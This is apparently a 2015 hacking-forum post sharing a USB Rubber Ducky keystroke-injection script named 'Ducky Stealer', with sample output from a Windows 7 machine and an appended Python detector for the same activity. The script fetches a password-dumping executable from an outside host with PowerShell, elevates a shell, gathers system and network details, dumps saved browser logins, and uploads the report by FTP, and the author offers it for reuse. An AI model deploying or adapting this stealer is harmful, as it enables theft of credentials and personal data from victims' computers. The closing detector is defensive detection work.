Well I finally decided fuck it and got a rubber ducky. Bored at work, hand wrote this script, will test at home and make modifications as necessary.
REM ********************************
REM *** builddate28.5.2015 ***
REM *** DeepCopy's Ducky Stealer ***
REM *** v1.0 evilzone.org ***
REM ********************************
REM ********************************
REM *** Initial Delay ***
DELAY 2000
REM *** Download Dependencies ***
GUI r
DELAY 400
STRING cmd
DELAY 400
ENTER
GUI r
DELAY 400
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://upload.evilzone.org/?page=download&file=GePROYjEHwjSRNAZgXi9M0QPtLGj00bT3VBFy3mvvNDkwH95e8','%TEMP%\bpd.exe');
ENTER
DELAY 7000
REM *** UAC Bypass - Elevated CMD ***
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
REM *** Start Stealer ***
STRING cd %TEMP%
ENTER
DELAY 400
STRING set num=%random%
ENTER
DELAY 200
STRING set report=%USERNAME%-%num%
ENTER
DELAY 200
STRING echo DeepCopy's Ducky Stealer v1.0 > %report%.txt
ENTER
DELAY 300
STRING echo. >> %report%.txt
ENTER
DELAY 200
STRING echo System Reconnaissance >> %report%.txt
ENTER
DELAY 200
STRING systeminfo >> %report%.txt
ENTER
DELAY 11000
STRING tasklist /v >> %report%.txt
ENTER
DELAY 400
STRING net start >> %report%.txt
ENTER
DELAY 500
STRING net user >> %report%.txt
ENTER
DELAY 300
STRING echo IP Information: >> %report%.txt
ENTER
DELAY 1000
STRING echo. >> %report%.txt
ENTER
DELAY 200
STRING ipconfig /all >> %report%.txt
ENTER
DELAY 400
STRING nslookup myip.opendns.com resolver1.opendns.com >> %report%.txt
ENTER
DELAY 1000
STRING echo. >> %report%.txt
ENTER
DELAY 1000
STRING echo Drives and Directories: >> %report%.txt
ENTER
DELAY 1000
STRING mountvol >> %report%.txt
ENTER
STRING cd %programfiles%
ENTER
STRING dir >> %TEMP%\%report%.txt
ENTER
DELAY 1000
STRING cd %programfiles(x86)%
ENTER
STRING dir >> %TEMP%\%report%.txt
ENTER
DELAY 1000
STRING cd %TEMP%
ENTER
STRING echo. >> %report%.txt
ENTER
DELAY 100
STRING echo Website Save Passwords: >> %report%.txt
ENTER
DELAY 400
STRING bpd.exe -f webpass.txt
ENTER
DELAY 7000
STRING copy %report%.txt + webpass.txt %report%.txt
ENTER
REM *** Create FTP Profile ***
STRING echo user user>ftp.dcs
ENTER
STRING echo pass>>ftp.dcs
ENTER
STRING echo cd htdocs>>ftp.dcs
ENTER
STRING echo PUT %report%.txt>>ftp.dcs
ENTER
STRING echo quit>>ftp.dcs
ENTER
STRING ftp -n -s:ftp.dcs ftp.server
ENTER
DELAY 5000
REM *** Melt Harvested Information ***
REM STRING del /f /q *.dcs
REM ENTER
REM STRING del /f /q *.exe
REM ENTER
REM STRING del /f /q *.txt
REM ENTER
STRING exit
ENTER
REM *** Notify Script is Done ***
GUI r
DELAY 600
STRING notepad
ENTER
DELAY 1000
STRING I'm done master
DELAY 4000
ALT F4
STRING n
ENTER
Edit:
I made some changes, some things wouldn't have worked... I'm sorting out some hosting issues and then I will test it out
EDIT 5/30/15
Finally working... I will edit and clean up this thread and post what it does, but for now, read the report output (done from a live win 7 x64 system) and you'll get the hint. To use the script on your own ducky/nethunter device, simply change the FTP settings for your server and you're good to go to use my script. I will create a twin duck version possibly for offline use (download and reports will be on the USB).
Example output:
DeepCopy's Ducky Stealer v1.0
System Reconnaissance
Host Name: xxxx-PC
OS Name: Microsoft Windows 7 Ultimate
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: xxxx
Registered Organization:
Product ID: xxx-OEM-xxxx-xxx
Original Install Date: 7/22/2013, 11:50:51 AM
System Boot Time: 5/30/2015, 9:12:46 PM
System Manufacturer: HP-Pavilion
System Model: VT493AA-ABA s5212y
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~2500 Mhz
BIOS Version: Phoenix Technologies, LTD 5.24, 6/19/2009
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 3,061 MB
Available Physical Memory: 1,724 MB
Virtual Memory: Max Size: 6,121 MB
Virtual Memory: Available: 4,548 MB
Virtual Memory: In Use: 1,573 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\xxxx-PC
Hotfix(s): 347 Hotfix(s) Installed.
Network Card(s): 1 NIC(s) Installed.
[01]: Realtek RTL8101E Family PCI-E Fast Ethernet NIC (NDIS 6.20)
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: xx.xxx.xx.xx
IP address(es)
[01]: xx.xxx.xx.xxx
[02]: xxxx::xxxx:xxxx:xxxx:xxxx
[03]: xxxx:xxx:xxxx:xx:xxxx:xxxx:xxxx:xxxx
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ======== ================ =========== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Services 0 24 K Unknown NT AUTHORITY\SYSTEM 0:56:14 N/A
System 4 Services 0 6,740 K Unknown N/A 0:00:22 N/A
smss.exe 832 Services 0 1,088 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 992 Services 0 4,568 K Unknown NT AUTHORITY\SYSTEM 0:00:01 N/A
wininit.exe 364 Services 0 4,380 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 384 Console 1 9,100 K Running NT AUTHORITY\SYSTEM 0:00:02 N/A
winlogon.exe 436 Console 1 7,196 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 480 Services 0 9,888 K Unknown NT AUTHORITY\SYSTEM 0:00:03 N/A
lsass.exe 496 Services 0 12,488 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
lsm.exe 508 Services 0 4,124 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 804 Services 0 9,344 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 996 Services 0 8,932 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1044 Services 0 23,732 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 1108 Services 0 126,036 K Unknown NT AUTHORITY\SYSTEM 0:00:24 N/A
svchost.exe 1152 Services 0 21,840 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
svchost.exe 1184 Services 0 39,900 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
svchost.exe 1300 Services 0 5,844 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1432 Services 0 15,932 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:02 N/A
spoolsv.exe 1552 Services 0 14,404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 1592 Services 0 14,308 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:02 N/A
armsvc.exe 1776 Services 0 3,948 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
taskhost.exe 1856 Console 1 17,148 K Running xxx-PC\xxx 0:00:00 MCI command handling window
agr64svc.exe 1960 Services 0 2,696 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
dwm.exe 1968 Console 1 28,584 K Running xxx-PC\xxx 0:00:31 DWM Notification Window
mDNSResponder.exe 2020 Services 0 5,824 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2044 Services 0 8,580 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
DymoPnpService.exe 1336 Services 0 20,228 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
explorer.exe 1688 Console 1 79,496 K Running xxx-PC\xxx 0:00:24 N/A
hkcmd.exe 2180 Console 1 6,180 K Running xxx-PC\xxx 0:00:00 N/A
igfxsrvc.exe 2256 Console 1 6,048 K Running xxx-PC\xxx 0:00:00 OleMainThreadWndName
igfxpers.exe 2316 Console 1 6,036 K Running xxx-PC\xxx 0:00:00 PersistWndName
svchost.exe 2552 Services 0 11,588 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:01 N/A
PSANHost.exe 2668 Services 0 20,760 K Unknown NT AUTHORITY\SYSTEM 0:00:33 N/A
AgentSvc.exe 2796 Services 0 15,516 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PSUAMain.exe 2868 Console 1 564 K Running xxx-PC\xxx 0:00:01 TryBarAPPAV
PhoneMyPC_Helper.exe 3056 Services 0 15,632 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PSUAService.exe 2352 Services 0 404 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
PhoneMyPC.exe 2476 Console 1 19,504 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 2160 Services 0 12,100 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
OSPPSVC.EXE 3828 Services 0 11,876 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:01 N/A
SearchIndexer.exe 3912 Services 0 24,840 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
WUDFHost.exe 3968 Services 0 6,164 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
wmpnetwk.exe 3636 Services 0 10,216 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:01 N/A
svchost.exe 3092 Services 0 5,976 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
IntuitUpdateService.exe 1796 Services 0 3,720 K Unknown NT AUTHORITY\SYSTEM 0:00:02 N/A
svchost.exe 4512 Services 0 26,572 K Unknown NT AUTHORITY\SYSTEM 0:00:05 N/A
svchost.exe 1584 Services 0 11,772 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
chrome.exe 4580 Console 1 97,716 K Running xxx-PC\xxx 0:00:26 [DUCKY] DeepCopy Ducky Stealer v1.0 (WIP) - Google Chrome
chrome.exe 4084 Console 1 109,348 K Unknown xxx-PC\xxx 0:00:05 N/A
chrome.exe 3472 Console 1 31,172 K Unknown xxx-PC\xxx 0:00:00 N/A
chrome.exe 3140 Console 1 9,256 K Unknown xxx-PC\xxx 0:00:00 N/A
chrome.exe 3268 Console 1 62,012 K Unknown xxx-PC\xxx 0:00:16 N/A
chrome.exe 4928 Console 1 62,448 K Unknown xxx-PC\xxx 0:00:05 N/A
audiodg.exe 1600 Services 0 17,528 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
WmiPrvSE.exe 4396 Services 0 6,732 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
cmd.exe 4492 Console 1 2,908 K Running xxx-PC\xxx 0:00:00 Administrator: C:\Windows\system32\cmd.exe - tasklist /v
conhost.exe 2152 Console 1 5,888 K Running xxx-PC\xxx 0:00:00 OleMainThreadWndName
WmiPrvSE.exe 2680 Services 0 12,128 K Unknown NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
WmiPrvSE.exe 4836 Services 0 5,824 K Unknown NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
TrustedInstaller.exe 3108 Services 0 14,028 K Unknown NT AUTHORITY\SYSTEM 0:00:14 N/A
tasklist.exe 1212 Console 1 5,980 K Unknown xxx-PC\xxxxx 0:00:00 N/A
These Windows services are started:
Adobe Acrobat Update Service
Agere Modem Call Progress Audio
Application Experience
Application Information
Base Filtering Engine
Bonjour Service
CNG Key Isolation
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
Desktop Window Manager Session Manager
DHCP Client
Diagnostic Policy Service
Diagnostic Service Host
Diagnostic System Host
Diagnostics Tracking Service
Distributed Link Tracking Client
DNS Client
DYMO PnP Service
Encrypting File System (EFS)
Function Discovery Provider Host
Function Discovery Resource Publication
Group Policy Client
HomeGroup Listener
HomeGroup Provider
Human Interface Device Access
IKE and AuthIP IPsec Keying Modules
Intuit Update Service v4
IP Helper
IPsec Policy Agent
Multimedia Class Scheduler
Network Connections
Network List Service
Network Location Awareness
Network Store Interface Service
Office Software Protection Platform
Offline Files
Panda Devices Agent
Panda Product Service
Panda Protection Service
Peer Name Resolution Protocol
Peer Networking Grouping
Peer Networking Identity Manager
Plug and Play
PnP-X IP Bus Enumerator
Portable Device Enumerator Service
Power
Print Spooler
Program Compatibility Assistant Service
Remote Procedure Call (RPC)
RPC Endpoint Mapper
Security Accounts Manager
Security Center
Server
Shell Hardware Detection
SSDP Discovery
Superfetch
System Event Notification Service
Task Scheduler
TCP/IP NetBIOS Helper
Themes
User Profile Service
WebClient
Windows Audio
Windows Audio Endpoint Builder
Windows Connect Now - Config Registrar
Windows Defender
Windows Driver Foundation - User-mode Driver Framework
Windows Event Log
Windows Firewall
Windows Font Cache Service
Windows Image Acquisition (WIA)
Windows Management Instrumentation
Windows Media Player Network Sharing Service
Windows Modules Installer
Windows Search
Windows Update
WinHTTP Web Proxy Auto-Discovery Service
Workstation
The command completed successfully.
User accounts for \\xxxx-PC
-------------------------------------------------------------------------------
Administrator Guest xxxx
The command completed successfully.
IP Information:
Windows IP Configuration
Host Name . . . . . . . . . . . . : xxxx-PC
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : xxxx.xx.xxxxxxx.net
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xxxx.xx.xxxxxxx.net.
Description . . . . . . . . . . . : Realtek RTL8101E Family PCI-E Fast Ethernet NIC (NDIS 6.20)
Physical Address. . . . . . . . . : xx-xx-xx-xx-xx-xx
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2001:558:6045:5e:147b:10a5:b298:a98e(Preferred)
Lease Obtained. . . . . . . . . . : Saturday, May 30, 2015 9:36:50 PM
Lease Expires . . . . . . . . . . : Wednesday, June 03, 2015 9:36:50 PM
Link-local IPv6 Address . . . . . : xxxx::xxxx:xxxx:xxxx:xxxx%xx(Preferred)
IPv4 Address. . . . . . . . . . . : x.xxx.xx.xxx(Preferred)
Subnet Mask . . . . . . . . . . . : xxx.xxx.xxx.x
Lease Obtained. . . . . . . . . . : Saturday, May 30, 2015 9:30:00 PM
Lease Expires . . . . . . . . . . : Saturday, May 30, 2015 10:30:00 PM
Default Gateway . . . . . . . . . : xxxx::xxxx:xxxx:xxxx:xxxx%xx
xx.xx.xx.xx
DHCP Server . . . . . . . . . . . : xx.xx.xx.xx
DHCPv6 IAID . . . . . . . . . . . : xxxx
DHCPv6 Client DUID. . . . . . . . : xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx-xx
DNS Servers . . . . . . . . . . . : 2001:558:feed::1
2001:558:feed::2
xx.xx.xx.xx
xx.xx.xx.xx
NetBIOS over Tcpip. . . . . . . . : Enabled
Connection-specific DNS Suffix Search List :
xxxx.xx.xxxxxxx.net
Tunnel adapter isatap.hsd1.ca.comcast.net.:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : xxxx.xx.xxxxxxx.net.
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Server: resolver1.opendns.com
Address: 208.67.222.222
Name: myip.opendns.com
Address: xxx.xxx.xxx.xxx
Drives and Directories:
Creates, deletes, or lists a volume mount point.
MOUNTVOL [drive:]path VolumeName
MOUNTVOL [drive:]path /D
MOUNTVOL [drive:]path /L
MOUNTVOL [drive:]path /P
MOUNTVOL /R
MOUNTVOL /N
MOUNTVOL /E
path Specifies the existing NTFS directory where the mount
point will reside.
VolumeName Specifies the volume name that is the target of the mount
point.
/D Removes the volume mount point from the specified directory.
/L Lists the mounted volume name for the specified directory.
/P Removes the volume mount point from the specified directory,
dismounts the volume, and makes the volume not mountable.
You can make the volume mountable again by creating a volume
mount point.
/R Removes volume mount point directories and registry settings
for volumes that are no longer in the system.
/N Disables automatic mounting of new volumes.
/E Re-enables automatic mounting of new volumes.
Possible values for VolumeName along with current mount points are:
\\?\Volume{899bc397-f2f5-11e2-b4be-806e6f6e6963}\
*** NO MOUNT POINTS ***
\\?\Volume{899bc398-f2f5-11e2-b4be-806e6f6e6963}\
C:\
\\?\Volume{899bc3a4-f2f5-11e2-b4be-806e6f6e6963}\
F:\
\\?\Volume{899bc3a8-f2f5-11e2-b4be-806e6f6e6963}\
G:\
\\?\Volume{899bc39b-f2f5-11e2-b4be-806e6f6e6963}\
D:\
Volume in drive C has no label.
Volume Serial Number is CCEF-290B
Directory of C:\Program Files
05/30/2015 08:17 PM <DIR> .
05/30/2015 08:17 PM <DIR> ..
02/06/2015 04:12 PM <DIR> Android
06/22/2014 11:24 AM <DIR> Apache Software Foundation
09/03/2014 08:44 PM <DIR> Bonjour
08/21/2013 01:11 PM <DIR> CCleaner
01/24/2014 10:45 AM <DIR> Common Files
02/12/2014 04:29 PM <DIR> DIFX
04/12/2011 01:28 AM <DIR> DVD Maker
07/22/2013 02:38 PM <DIR> HP
05/13/2015 05:38 PM <DIR> Internet Explorer
02/06/2015 04:09 PM <DIR> Java
07/22/2013 03:11 PM <DIR> LSI SoftModem
07/30/2013 11:58 AM <DIR> Microsoft Analysis Services
04/12/2011 01:28 AM <DIR> Microsoft Games
07/30/2013 12:00 PM <DIR> Microsoft Office
07/30/2013 12:00 PM <DIR> Microsoft SQL Server Compact Edition
07/30/2013 12:00 PM <DIR> Microsoft Synchronization Services
07/13/2009 10:32 PM <DIR> MSBuild
07/22/2013 02:54 PM <DIR> Realtek
07/13/2009 10:32 PM <DIR> Reference Assemblies
01/05/2014 12:05 PM <DIR> SAMSUNG
07/04/2014 02:06 PM <DIR> SoftwareForMe Inc
07/23/2013 03:28 AM <DIR> Windows Defender
05/13/2015 05:37 PM <DIR> Windows Journal
04/12/2011 01:17 AM <DIR> Windows Mail
03/11/2015 03:25 AM <DIR> Windows Media Player
07/13/2009 10:32 PM <DIR> Windows NT
04/12/2011 01:17 AM <DIR> Windows Photo Viewer
11/20/2010 08:31 PM <DIR> Windows Portable Devices
04/12/2011 01:17 AM <DIR> Windows Sidebar
07/30/2013 11:47 AM <DIR> WinRAR
1 File(s) 2,010 bytes
32 Dir(s) 125,307,084,800 bytes free
Volume in drive C has no label.
Volume Serial Number is CCEF-290B
Directory of C:\Program Files (x86)
05/30/2015 08:17 PM <DIR> .
05/30/2015 08:17 PM <DIR> ..
10/01/2013 12:11 AM <DIR> Adobe
01/27/2014 12:07 AM <DIR> Antenna
04/25/2015 04:03 PM <DIR> ArtCine NFO Creator 2.0
04/25/2015 07:04 PM <DIR> Audacity
09/03/2014 08:44 PM <DIR> Bonjour
07/27/2014 05:37 PM <DIR> Breaktru Software
02/06/2015 04:10 PM <DIR> Common Files
08/20/2014 07:38 PM <DIR> DYMO
06/13/2014 12:27 AM <DIR> FileZilla FTP Client
01/24/2014 10:37 AM <DIR> Free Download Manager
03/11/2015 07:45 AM <DIR> Google
07/22/2013 02:38 PM <DIR> HP
06/13/2014 01:48 AM <DIR> iCare Data Recovery
04/04/2015 01:28 PM <DIR> ImageWriter
05/13/2015 05:38 PM <DIR> Internet Explorer
02/20/2015 01:43 AM <DIR> Java
02/12/2014 04:29 PM <DIR> LeapFrog
07/30/2013 11:58 AM <DIR> Microsoft Analysis Services
07/30/2013 11:58 AM <DIR> Microsoft Office
07/30/2013 12:00 PM <DIR> Microsoft.NET
06/13/2014 01:51 AM <DIR> MiniTool Partition Wizard Professional Edition 8.1
05/02/2015 09:03 PM <DIR> Mozilla Firefox
05/28/2015 04:21 PM <DIR> Mozilla Maintenance Service
07/13/2009 10:32 PM <DIR> MSBuild
01/24/2014 10:42 AM <DIR> MSXML 4.0
03/11/2015 07:45 AM <DIR> NCH Software
01/28/2014 11:51 PM <DIR> Nuance
06/12/2014 01:44 AM <DIR> Panda Security
07/13/2009 10:32 PM <DIR> Reference Assemblies
02/06/2015 02:55 PM <DIR> TurboTax
12/19/2014 06:13 PM <DIR> TypingMaster
07/23/2013 03:28 AM <DIR> Windows Defender
04/12/2011 01:17 AM <DIR> Windows Mail
03/11/2015 03:25 AM <DIR> Windows Media Player
07/13/2009 10:32 PM <DIR> Windows NT
04/12/2011 01:17 AM <DIR> Windows Photo Viewer
11/20/2010 08:31 PM <DIR> Windows Portable Devices
04/12/2011 01:17 AM <DIR> Windows Sidebar
1 File(s) 2,584 bytes
42 Dir(s) 125,307,080,704 bytes free
Website Save Passwords:
**********************************************
Browser Password Recovery Report
**********************************************
Browser: Google Chrome
Website: https://mfasa.chase.com/auth/login.html
Username: lololol
Password: olololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: https://segment.com/login
Username: lolololol
Password: lolololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: lololol
Username: lololol
Password: lololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: http://www.registry.cu.cc/checklogin.php
Username: lolololol
Password: lolololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: https://my.bluehost.com/web-hosting/cplogin
Username: lololololol
Password: lololololol
---------------------------------------------------------------------------
Browser: Google Chrome
Website: http://panel.byethost.com/login.php
Username: lololol
Password: lolol
---------------------------------------------------------------------------
_______________________________________________________________________
Produced by BrowserPasswordDump from http://www.SecurityXploded.com
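A defender's view of the sequence in this post, as an added example that is not part of the original post: a small Python detector run over constructed process-creation events (Sysmon Event ID 1 / Security 4688 style). The event tuples, rule names, PIDs, paths and the `example.invalid` hosts are assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tools the script runs back to back from one elevated shell.
RECON = {"systeminfo.exe", "tasklist.exe", "net.exe", "ipconfig.exe",
         "nslookup.exe", "mountvol.exe"}
# Command-line patterns for the download, elevation and upload stages.
CMDLINE_RULES = {
    "ps_download_exe_to_temp": re.compile(
        r"downloadfile\(.+(%temp%|\\temp)\\[^'\"]+\.exe", re.I),
    "ps_runas_elevation": re.compile(r"start-process\s+\S+.*-verb\s+runas", re.I),
    "scripted_ftp": re.compile(r"^ftp(\.exe)?\s.*-s:", re.I),
}
TEMP_EXE = re.compile(r"\\temp\\[^\\]+\.exe$", re.I)

def detect(events, window=timedelta(seconds=120), min_tools=4):
    """Return sorted (rule, pid) hits; for recon_burst the pid is the parent shell."""
    hits, by_parent = set(), defaultdict(list)
    for ts, ppid, pid, image, cmdline in events:
        for rule, rx in CMDLINE_RULES.items():
            if rx.search(cmdline):
                hits.add((rule, pid))
        if TEMP_EXE.search(image):
            hits.add(("exe_run_from_temp", pid))
        name = image.lower().rsplit("\\", 1)[-1]
        if name in RECON:
            by_parent[ppid].append((datetime.fromisoformat(ts), name))
    # cmd.exe performs the ">> report.txt" redirection itself, so it never shows up
    # in a child's command line; the burst rule keys on process names and timing.
    for ppid, runs in by_parent.items():
        runs.sort()
        for i, (start, _) in enumerate(runs):
            if len({n for t, n in runs[i:] if t - start <= window}) >= min_tools:
                hits.add(("recon_burst", ppid))
                break
    return sorted(hits)

# Constructed sample events: (time, parent PID, PID, image path, command line).
S = "C:\\Windows\\System32\\"
T = "C:\\Users\\u\\AppData\\Local\\Temp\\"
PS = S + "WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE = [
    ("2015-05-30T18:05:00", 5000, 5001, S + "ipconfig.exe", "ipconfig"),  # benign one-off
    ("2015-05-30T21:40:00", 1688, 4100, PS,
     "powershell (new-object System.Net.WebClient).DownloadFile("
     "'http://files.example.invalid/tool','" + T + "bpd.exe');"),
    ("2015-05-30T21:40:08", 1688, 4200, PS, "powershell Start-Process cmd -Verb runAs"),
    ("2015-05-30T21:40:11", 4200, 4492, S + "cmd.exe", "cmd.exe"),
    ("2015-05-30T21:40:13", 4492, 4501, S + "systeminfo.exe", "systeminfo"),
    ("2015-05-30T21:40:24", 4492, 4502, S + "tasklist.exe", "tasklist /v"),
    ("2015-05-30T21:40:25", 4492, 4503, S + "net.exe", "net start"),
    ("2015-05-30T21:40:26", 4492, 4504, S + "net.exe", "net user"),
    ("2015-05-30T21:40:28", 4492, 4505, S + "ipconfig.exe", "ipconfig /all"),
    ("2015-05-30T21:40:29", 4492, 4506, S + "nslookup.exe",
     "nslookup myip.opendns.com resolver1.opendns.com"),
    ("2015-05-30T21:40:31", 4492, 4507, S + "mountvol.exe", "mountvol"),
    ("2015-05-30T21:40:36", 4492, 4510, T + "bpd.exe", "bpd.exe -f webpass.txt"),
    ("2015-05-30T21:40:44", 4492, 4511, S + "ftp.exe",
     "ftp -n -s:ftp.dcs ftp.example.invalid"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE):
        print(f"{rule:26} pid={pid}")
```
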